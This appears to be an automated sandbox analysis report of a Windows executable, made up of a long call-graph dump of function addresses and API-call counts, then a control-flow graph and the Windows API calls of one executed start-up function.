Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67105->67138 67119 1041498 67108->67119 67169 104d340 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67108->67169 67111 1041217 67110->67111 67112 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67110->67112 67116 14ab38a _ValidateLocalCookies 5 API calls 67111->67116 67112->67111 67114 109eca0 381 API calls 67113->67114 67117 10415f4 67114->67117 67122 1042b78 67116->67122 67171 109ad00 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67117->67171 67118 104140d 67167 10432e0 381 API calls 67118->67167 67170 104f140 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67119->67170 67168 10432e0 381 API calls 67121->67168 67122->66802 67129->66801 67132 109ed19 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67130->67132 67131 10411f4 67131->67111 67139 105a040 67131->67139 67132->67131 67172 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67132->67172 67173 109edb0 67135->67173 67138->67094 67140 105a055 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67139->67140 67228 fe5090 67140->67228 67142 105a144 67142->67111 67143 105a10a 67143->67142 67144 105a040 928 API calls 67143->67144 67144->67143 67145 105a05e 67145->67143 67147 105a14b 67145->67147 67149 105a150 67145->67149 67242 fc5bc0 928 API calls 2 library calls 67145->67242 67243 10034d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67147->67243 67244 1002a30 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67149->67244 67151 105a159 67245 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67151->67245 67154 104d340 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67154->67111 67155->67111 67158 104b9f6 67156->67158 67157 104ba4a Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67157->67118 67158->67157 67250 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67158->67250 67167->67108 67168->67108 67169->67119 67170->67111 67171->67111 67179 109edd6 67173->67179 67174 109f4e1 67225 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67174->67225 67176 109f4eb 67226 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67176->67226 67177 109eee5 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67183 109f03a 67177->67183 67186 109f4c4 67177->67186 67188 109ef67 67177->67188 67178 109f4cb 67223 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67178->67223 67179->67174 67179->67177 67179->67178 67214 fe40e0 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67179->67214 67182 109f4f2 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67227 104aec0 394 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67182->67227 67183->67174 67190 109f0c4 67183->67190 67203 109f143 67183->67203 67184 109f4d7 67224 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67184->67224 67222 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67186->67222 67187 109f025 67217 fed8c0 SleepEx SwitchToThread Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67187->67217 67188->67178 67188->67187 67195 109f001 67188->67195 67196 109f015 67188->67196 67193 109f010 67190->67193 67201 109f100 67190->67201 67204 109f189 67193->67204 67207 109f139 67193->67207 67195->67187 67198 109f006 67195->67198 67216 fed8c0 SleepEx SwitchToThread Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67196->67216 67215 fed8c0 SleepEx SwitchToThread Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67198->67215 67218 104b870 394 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67201->67218 67205 104b9e0 394 API calls 67203->67205 67213 109f479 67203->67213 67208 14ab38a _ValidateLocalCookies 5 API calls 67204->67208 67205->67193 67212 109f1dc Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67207->67212 67219 10511c0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67207->67219 67210 1041226 67208->67210 67210->67111 67210->67154 67212->67174 67212->67176 67212->67184 67212->67186 67212->67213 67220 105af20 382 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67212->67220 67213->67182 67221 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67213->67221 67214->67177 67215->67193 67216->67193 67217->67193 67219->67212 67220->67213 67229 fe509f 67228->67229 67230 fe50b2 67228->67230 67246 fc5bc0 928 API calls 2 library calls 67229->67246 67232 fe50b0 67230->67232 67249 10034d0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67230->67249 67232->67145 67233 fe50aa 67233->67232 67247 1002a30 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67233->67247 67237 fe50ca 67248 1219250 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67237->67248 67242->67145 67244->67151 67246->67233 67247->67237 67252 fc86f5 67251->67252 67253 fc85ee 67251->67253 67252->66709 67254 fc865d 67253->67254 67271 fd8aa0 67253->67271 67263 fcecd0 67254->67263 67257 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67258 fc86d8 67257->67258 67260 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67258->67260 67259 fc8664 67262 fc868b 67259->67262 67275 1003010 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67259->67275 67260->67252 67262->67257 67264 fced9d 67263->67264 67265 fcece7 67263->67265 67289 101a1b0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67264->67289 67268 fced1e 67265->67268 67276 108d1d0 67265->67276 67270 fced35 67268->67270 67288 108d100 928 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67268->67288 67270->67259 67272 fd8abd 67271->67272 67321 104ce40 383 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67272->67321 67274 fd8ad9 67274->67254 67275->67262 67277 108d20b 67276->67277 67278 108d2b0 67276->67278 67298 1215d00 67277->67298 67279 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67278->67279 67282 108d2bf Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67279->67282 67281 108d23d Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67305 107cb60 GetTickCount SetEvent SleepEx SwitchToThread Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67281->67305 67283 108d305 67282->67283 67290 108ca50 67282->67290 67283->67268 67286 108d265 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67286->67278 67287 108d2a1 HeapFree 67286->67287 67287->67278 67288->67270 67289->67270 67291 108ca81 67290->67291 67293 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67291->67293 67294 108ca99 67291->67294 67297 108cb13 67291->67297 67292 1215ca0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67295 108cad0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67292->67295 67293->67294 67294->67292 67295->67297 67306 10df0e0 67295->67306 67297->67283 67299 1215d24 RtlAllocateHeap 67298->67299 67300 1215d0c GetProcessHeap 67298->67300 67301 1215d33 67299->67301 67302 1215d34 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67299->67302 67300->67299 67301->67281 67303 1219530 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 67302->67303 67304 1215d4f 67303->67304 67305->67286 67311 10df10c Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67306->67311 67307 10df280 67308 10172e0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67307->67308 67309 10df28f 67308->67309 67310 10172e0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67309->67310 67317 10df299 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67310->67317 67311->67307 67311->67309 67316 10df17b 67311->67316 67312 10df37d 67314 10172e0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67312->67314 67313 10172e0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67313->67312 67315 10df387 67314->67315 67315->67297 67318 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67316->67318 67319 10df1b2 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67316->67319 67317->67312 67317->67313 67320 10df339 67317->67320 67318->67319 67319->67297 67320->67297 67321->67274 67322->66617 67323->66633 67324->66633 67326 10d4f2d Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67325->67326 67329 10d4fda Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67326->67329 67419 115d9f0 LeaveCriticalSection Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67326->67419 67328 10d5005 67337 10d45a0 67328->67337 67329->67328 67330 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67329->67330 67330->67328 67335->66625 67336->66627 67420 10d4370 GetCurrentThreadId 67337->67420 67339 10d4669 67457 11852a0 67339->67457 67340 10d461a 67340->67339 67503 10196f0 381 API calls 2 library calls 67340->67503 67344 10d4a8d 67345 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 380 API calls 67344->67345 67369 10d4a9c 67345->67369 67346 10d46f2 67504 1183ca0 381 API calls 2 library calls 67346->67504 67348 10d4bbf 67463 1010950 67348->67463 67349 10d471f 67351 10d47ee 67349->67351 67353 10d479c 67349->67353 67360 10d4845 67351->67360 67518 fcf0e0 67351->67518 67352 10d4bd5 67354 14ab38a _ValidateLocalCookies 5 API calls 67352->67354 67505 1225f00 67353->67505 67358 10d4bec 67354->67358 67356 10d4a20 67359 10d4a36 67356->67359 67551 11844e0 381 API calls 2 library calls 67356->67551 67357 10d4b9a 67362 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 380 API calls 67357->67362 67400 10d3be0 67358->67400 67364 10d4a51 67359->67364 67552 1185070 381 API calls 2 library calls 67359->67552 67360->67356 67366 10d48a2 67360->67366 67362->67348 67368 10d4a1e 67364->67368 67553 11856d0 381 API calls 2 library calls 67364->67553 67365 10d47c0 wcscpy_s 67365->67360 67530 10a30f0 6 API calls 2 library calls 67366->67530 67554 1185180 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67368->67554 67369->67348 67369->67357 67556 1088980 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67369->67556 67373 10d4a6f 67375 fc1a30 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock HeapFree 67373->67375 67377 10d4a7e 67375->67377 67376 10d48cf 67531 10a30f0 6 API calls 2 library calls 67376->67531 67555 10125f0 HeapFree 67377->67555 67380 10d48e6 67532 10d50b0 6 API calls 2 library calls 67380->67532 67382 10d48f0 67533 fcf770 67382->67533 67385 fcf770 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 8 API calls 67386 10d497d 67385->67386 67387 fcf770 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 8 API calls 67386->67387 67388 10d4993 67387->67388 67541 12258e0 17 API calls 2 library calls 67388->67541 67390 10d49d0 67542 fcb100 67390->67542 67393 fcb100 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock HeapFree 67394 10d49ee 67393->67394 67395 fcb100 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock HeapFree 67394->67395 67396 10d49fd 67395->67396 67546 11846b0 381 API calls 2 library calls 67396->67546 67398 10d4a0f 67547 fc1a30 67398->67547 67401 10d3bf9 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67400->67401 67402 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 376 API calls 67401->67402 67406 10d3c0d 67401->67406 67402->67406 67403 10d3c3b 67404 10d3c98 67403->67404 67409 121ae20 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 28 API calls 67403->67409 67405 10d3cc6 67404->67405 67410 10d3ca4 67404->67410 67407 10d3cca ExitProcess 67405->67407 67408 10d3cc0 67405->67408 67406->67403 67604 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67406->67604 67408->66621 67412 10d3c63 67409->67412 67413 10d3cb2 GetCurrentProcess TerminateProcess 67410->67413 67412->67404 67414 121ae20 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 28 API calls 67412->67414 67413->67408 67415 10d3c74 67414->67415 67415->67404 67416 10d3c78 __acrt_iob_func 67415->67416 67605 10688f0 __stdio_common_vfprintf Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67416->67605 67418 10d3c8f DebugBreak 67418->67404 67419->67329 67421 10d43b9 67420->67421 67422 10d4417 67420->67422 67423 10d43bd 67421->67423 67424 10d43db 67421->67424 67570 1097580 GetStdHandle strlen WriteFile 67422->67570 67557 1097580 GetStdHandle strlen WriteFile 67423->67557 67558 fcfdd0 67424->67558 67428 10d43c7 67428->67340 67429 10d43e3 SleepEx 67563 fcfd40 67429->67563 67432 10d447c 67434 10d4494 67432->67434 67571 10975e0 381 API calls 2 library calls 67432->67571 67433 10d4403 67433->67340 67435 10d4498 67434->67435 67436 10d44a1 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67434->67436 67573 10975e0 381 API calls 2 library calls 67435->67573 67574 12195c0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67436->67574 67438 10d448a 67572 1097580 GetStdHandle strlen WriteFile 67438->67572 67441 10d449f 67587 1097580 GetStdHandle strlen WriteFile 67441->67587 67444 10d44ba 67575 1223c50 67444->67575 67445 10d44e0 67447 10d44ff 67445->67447 67588 10d4020 381 API calls 2 library calls 67445->67588 67449 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 379 API calls 67447->67449 67452 10d450b 67449->67452 67452->67340 67453 10d44ca 67455 fcb100 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock HeapFree 67453->67455 67454 10d44f3 67454->67447 67589 10975e0 381 API calls 2 library calls 67454->67589 67455->67441 67458 11852bb IsDebuggerPresent 67457->67458 67459 11852b2 67457->67459 67460 10d46dd 67458->67460 67461 11852c5 67458->67461 67459->67458 67459->67460 67460->67344 67460->67346 67461->67460 67462 121ae20 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 28 API calls 67461->67462 67462->67460 67464 1010987 67463->67464 67465 1010994 67463->67465 67466 121ae20 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 28 API calls 67464->67466 67467 1010ccb SetErrorMode SetErrorMode 67465->67467 67468 10109c2 IsDebuggerPresent 67465->67468 67469 1010b74 67465->67469 67466->67465 67488 1010c17 67467->67488 67468->67469 67471 10109d0 67468->67471 67469->67467 67470 1010b93 IsDebuggerPresent 67469->67470 67470->67467 67472 1010ba3 67470->67472 67475 1010a3d 67471->67475 67471->67488 67491 1010a49 67471->67491 67472->67467 67473 1010bad SetErrorMode SetErrorMode 67472->67473 67474 1010bbe 67473->67474 67482 1010be0 67474->67482 67483 1010c47 67474->67483 67474->67488 67594 10108d0 21 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67475->67594 67477 1010b30 67478 1010b51 IsDebuggerPresent 67477->67478 67479 1010a44 67477->67479 67478->67467 67484 1010b5f SetErrorMode SetErrorMode 67478->67484 67479->67477 67479->67478 67480 1010a9b 67481 fcfdd0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 369 API calls 67480->67481 67485 1010aa3 67481->67485 67482->67488 67595 10106d0 381 API calls 2 library calls 67482->67595 67483->67488 67596 10106d0 381 API calls 2 library calls 67483->67596 67484->67474 67493 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 369 API calls 67485->67493 67494 1010ad2 67485->67494 67488->67352 67489 1010c58 67489->67352 67490 1010bf1 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67490->67488 67495 1010bfe IsDebuggerPresent 67490->67495 67491->67477 67491->67480 67492 fcfef0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 369 API calls 67491->67492 67492->67480 67493->67494 67496 1010aec RaiseFailFastException 67494->67496 67495->67488 67497 1010c0c DebugBreak 67495->67497 67498 1010b1e 67496->67498 67499 1010b02 67496->67499 67497->67488 67500 fcfd40 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 369 API calls 67498->67500 67499->67498 67501 1010b0b 67499->67501 67500->67477 67502 122a520 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 369 API calls 67501->67502 67502->67498 67503->67339 67504->67349 67506 1225f1b 67505->67506 67507 1225f0f 67505->67507 67509 1225f81 67506->67509 67510 1225f37 67506->67510 67597 1225f90 6 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67507->67597 67511 1219530 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock RaiseException 67509->67511 67513 1225f4f 67510->67513 67598 1219960 67510->67598 67514 1225f86 67511->67514 67512 1225f14 67512->67365 67516 1225f5e 67513->67516 67517 fcfe20 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 4 API calls 67513->67517 67516->67365 67517->67516 67519 fcf0fd 67518->67519 67520 fcf154 67518->67520 67519->67520 67521 fcf10a 67519->67521 67524 fcf176 67520->67524 67525 fcf1a0 67520->67525 67528 1215d00 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67520->67528 67523 fcf137 67521->67523 67527 fcf122 HeapFree 67521->67527 67522 fcfe20 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 4 API calls 67526 fcf1d3 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67522->67526 67523->67360 67524->67525 67529 fcf18e HeapFree 67524->67529 67525->67522 67526->67360 67527->67523 67528->67524 67529->67525 67530->67376 67531->67380 67532->67382 67534 fcf7c5 67533->67534 67535 fcf807 67533->67535 67534->67535 67537 fcf7cb 67534->67537 67536 fcf840 67535->67536 67538 fcf0e0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 6 API calls 67535->67538 67536->67385 67539 1225f00 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 7 API calls 67537->67539 67538->67536 67540 fcf7eb wcscpy_s 67539->67540 67540->67536 67541->67390 67543 fcb149 67542->67543 67544 fcb133 67542->67544 67543->67393 67544->67543 67545 fcb13a HeapFree 67544->67545 67545->67543 67546->67398 67548 fc1a79 67547->67548 67549 fc1a63 67547->67549 67548->67368 67549->67548 67550 fc1a6a HeapFree 67549->67550 67550->67548 67551->67359 67552->67364 67553->67368 67554->67373 67555->67344 67556->67357 67557->67428 67559 fcfe0a 67558->67559 67560 fcfde7 67558->67560 67559->67429 67560->67559 67590 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67560->67590 67562 fcfe06 67562->67429 67564 fcfd68 67563->67564 67566 fcfd96 67563->67566 67565 fcfdb7 67564->67565 67591 115dbc0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67564->67591 67565->67433 67566->67565 67592 115dfb0 381 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67566->67592 67568 fcfd87 67568->67433 67570->67432 67571->67438 67572->67434 67573->67441 67574->67444 67576 1223d78 67575->67576 67580 1223ca1 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67575->67580 67577 14ab38a _ValidateLocalCookies 5 API calls 67576->67577 67578 10d44c2 67577->67578 67586 10975e0 381 API calls 2 library calls 67578->67586 67579 1223d70 67593 1223bc0 7 API calls Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67579->67593 67580->67576 67580->67579 67582 1223cbf 67580->67582 67583 fcf0e0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 6 API calls 67582->67583 67584 1223d2c 67583->67584 67584->67576 67585 1223d5f HeapFree 67584->67585 67585->67576 67586->67453 67587->67445 67588->67454 67589->67447 67590->67562 67591->67568 67592->67565 67593->67576 67594->67479 67595->67490 67596->67489 67597->67512 67599 1219971 67598->67599 67603 1219978 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67598->67603 67600 1215d00 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 3 API calls 67599->67600 67600->67603 67601 12199af 67601->67513 67602 12199a0 HeapFree 67602->67601 67603->67601 67603->67602 67604->67403 67605->67418 67606->66542 67607 fd98a0 67608 fd98ff 67607->67608 67617 10df840 67608->67617 67611 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67612 fd994f 67611->67612 67613 10df840 381 API calls 67612->67613 67616 fd9a4a 67612->67616 67614 fd9a39 67613->67614 67615 10aed60 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67614->67615 67615->67616 67618 10df85b Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 67617->67618 67619 10df0e0 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67618->67619 67620 fd993e 67619->67620 67620->67611 67679 ff3310 67680 ff332e 67679->67680 67681 ff3406 67679->67681 67680->67681 67684 ff3350 67680->67684 67682 ff3d40 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67681->67682 67683 ff3432 67682->67683 67685 ff3d40 Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock 381 API calls 67684->67685 67686 ff337f 67684->67686 67685->67686

                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                          Function 01418400 Relevance: 70.7, APIs: 27, Strings: 13, Instructions: 675memorylibraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 1418400-1418419 VirtualProtect 1 1418451-14184d2 call 1219520 call 14aa361 call 10d4ef0 0->1 2 141841b-141844b GetTickCount VirtualProtect 0->2 11 14184d4-14184da 1->11 12 14184dc-14184e5 1->12 2->1 3 141844d-1418450 2->3 13 14184e8-1418580 GetSystemInfo SetConsoleCtrlHandler GetModuleHandleW GetProcAddress GetModuleHandleW GetProcAddress call 12235a0 call 10d2db0 11->13 12->13 18 1418cb0-1418cd1 call 10aed60 13->18 19 1418586-141859f call 1011500 call 12281b0 call 14183c0 call 122e1f0 13->19 25 1418cd3-1418cd9 18->25 26 1418cf2-1418cf9 18->26 19->18 41 14185a5-14186b7 InitializeCriticalSection * 4 call fda4e0 call 108c050 call 1097da0 call 1084dc0 call 122a500 19->41 27 1418ce0-1418ced 25->27 28 1418cdb 25->28 29 1418dc8 26->29 30 1418cff-1418d18 call 121ae20 26->30 27->26 28->27 33 1418dcd-1418dd0 29->33 30->33 36 1418dd2 DebugBreak 33->36 37 1418dd8-1418de9 33->37 36->37 52 14186c9-14186e8 call 12ce600 call 121af40 41->52 53 14186b9-14186c6 call 122a520 41->53 60 141879e-1418804 call 12d75e0 call 14181c0 call 1167520 call 141a2e0 call 1418400 call 101f110 InitializeCriticalSection call 10633a0 call 122a500 52->60 61 14186ee-141875d call 121af40 * 4 call 121af80 52->61 53->52 94 1418816-141882b call 122a500 60->94 95 1418806-1418813 call 122a520 60->95 82 1418766-141879b call 1229bc0 call fe6500 61->82 83 141875f 61->83 82->60 83->82 100 1418843-1418850 call 10d95f0 94->100 101 141882d-1418840 call 122a520 94->101 95->94 106 1418852 call 10d2f70 100->106 107 14188af-14188bd call 1168c30 100->107 101->100 110 1418857-141886a call 122a500 106->110 113 14188da 107->113 114 14188bf-14188d8 call 121ae20 107->114 119 1418890-1418892 110->119 120 141886c-141886e 110->120 117 14188df-14188e2 113->117 114->117 121 14188e4 DebugBreak 117->121 122 14188ea-14188f7 117->122 119->107 126 1418894-14188ac call 122a520 119->126 120->18 123 1418874-141888b call 122a520 120->123 121->122 124 1418905-1418997 call 141a280 InitializeCriticalSection call 1060ef0 call ff6e10 InitializeCriticalSection call 11c0340 call 1419960 122->124 125 14188f9-14188ff SleepEx 122->125 123->18 143 14189a5-14189ba call 1215ca0 124->143 144 1418999-14189a0 124->144 125->124 126->107 147 14189d7 143->147 148 14189bc-14189d5 143->148 144->18 149 14189d9-1418a69 call 1159cd0 call 109a7e0 InitializeCriticalSection call fc2cd0 call 1006570 call 10b2d10 call 14167a0 InitializeCriticalSection call 1183040 147->149 148->149 164 1418a77-1418a89 call 1419a70 call 11362f0 149->164 165 1418a6b-1418a72 149->165 164->18 170 1418a8f-1418aa3 RtlAddVectoredExceptionHandler 164->170 165->18 171 1418aa9-1418ad3 call 107cb00 SetUnhandledExceptionFilter call 10844f0 170->171 172 1418dea-1418e1f call 1017580 call fcda50 call 14b061b call 122a500 170->172 181 1418af0-1418b58 call 106cf40 call 10f64d0 InitializeCriticalSection call 11b7e10 call 1102380 call 10811f0 171->181 182 1418ad5-1418aec 171->182 191 1418e21-1418e34 call 122a520 172->191 192 1418e37-1418e48 call fcd630 172->192 222 1418b68-1418b6d 181->222 223 1418b5a-1418b65 call 145c570 181->223 182->181 191->192 201 1418e4a-1418e51 call fcff80 192->201 202 1418e7d-1418f0c call 14b061b InitializeCriticalSection call 1418480 192->202 201->202 211 1418e53-1418e61 call fcff80 call fccba0 201->211 215 1418f11-1418fa1 202->215 211->202 221 1418e63-1418e76 call fcff80 211->221 221->202 231 1418e78 call 115dfb0 221->231 222->18 226 1418b73-1418b9d call 12ce780 call 10e0070 call 10daa70 222->226 223->222 237 1418bb4-1418c46 InitializeCriticalSection call fc3220 call fc4640 call fc5d40 call fc6ab0 call 121ae20 226->237 238 1418b9f-1418bb0 226->238 231->202 250 1418c50 237->250 251 1418c48-1418c4e 237->251 238->237 252 1418c55-1418c97 VirtualAlloc call 122a500 250->252 251->252 254 1418c9c-1418c9e 252->254 254->18 255 1418ca0-1418cad call 122a520 254->255 255->18
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(0150E8D8,00000004,00000004,00000000,?,?,014187BE,?,00FC0000,?,?,00000000), ref: 01418411
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0141841B
                                                                                                                                                                                                                          • VirtualProtect.KERNEL32(0150E8D8,00000004,00000000,00000000,?,?,014187BE,?,00FC0000,?,?,00000000), ref: 01418443
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(0163F09C,7CAB6A82,00000000,?,00000000), ref: 0141850C
                                                                                                                                                                                                                          • SetConsoleCtrlHandler.KERNEL32(01418330,00000001,?,00000000), ref: 0141852D
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 01418538
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitializeContext2), ref: 01418544
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,?,00000000), ref: 01418554
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RtlRestoreContext), ref: 01418566
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0163EE00,?,00000000), ref: 014185B4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
